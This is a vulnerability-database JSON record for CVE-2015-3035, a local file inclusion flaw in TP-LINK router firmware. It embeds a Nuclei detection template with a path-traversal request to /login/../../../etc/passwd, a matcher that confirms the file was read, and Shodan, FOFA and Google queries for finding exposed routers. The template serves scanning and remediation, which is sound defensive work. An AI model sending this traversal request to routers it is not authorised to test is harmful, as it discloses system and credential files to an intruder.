{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2015-3035/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2015-3035/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2015-3035/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2015-3035/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2015-3035/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2015-3035"},"sightings":{"href":"/api/v1/sightings/cve-2015-3035"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2015/CVE-2015-3035.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2015-3035\n\ninfo:\n  name: TP-LINK - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: |\n    TP-LINK is susceptible to local file inclusion in these products: Archer C5 (1.2) with firmware before 150317, Archer C7 (2.0) with firmware before 150304, and C8 (1.0) with firmware before 150316, Archer C9 (1.0), TL-WDR3500 (1.0), TL-WDR3600 (1.0), and TL-WDR4300 (1.0) with firmware before 150302, TL-WR740N (5.0) and TL-WR741ND (5.0) with firmware before 150312, and TL-WR841N (9.0), TL-WR841N (10.0), TL-WR841ND (9.0), and TL-WR841ND (10.0) with firmware before 150310.  Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed.\n  impact: |\n    An attacker can read sensitive files on the TP-LINK router, potentially leading to unauthorized access or disclosure of sensitive information.\n  remediation: |\n    Apply the latest firmware update provided by TP-LINK to fix the local file inclusion vulnerability.\n  reference:\n    - https://seclists.org/fulldisclosure/2015/Apr/26\n    - https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20150410-0_TP-Link_Unauthenticated_local_file_disclosure_vulnerability_v10.txt\n    - http://www.tp-link.com/en/download/TL-WDR3600_V1.html#Firmware\n    - https://nvd.nist.gov/vuln/detail/CVE-2015-3035\n    - http://www.tp-link.com/en/download/Archer-C5_V1.20.html#Firmware\n  classification:\n    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N\n    cvss-score: 7.8\n    cve-id: CVE-2015-3035\n    cwe-id: CWE-22\n    epss-score: 0.83948\n    epss-percentile: 0.9968\n    cpe: cpe:2.3:o:tp-link:tl-wr841n_\\(9.0\\)_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: tp-link\n    product: tl-wr841n_\\(9.0\\)_firmware\n    shodan-query:\n      - http.title:\"TP-LINK\"\n      - http.title:\"tp-link\"\n    fofa-query: title=\"tp-link\"\n    google-query: intitle:\"tp-link\"\n  tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/login/../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        regex:\n          - \"root:[x*]:0:0\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100c15fab1bcb4a8120e85659f9206265bc47f8880b05c3d2877b78e7cbff2b3d79022042fd5cb566e6fc44fae23aa8358a5507292d80f9f2bb6967b3bfca5ed419d754:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2015-3035"}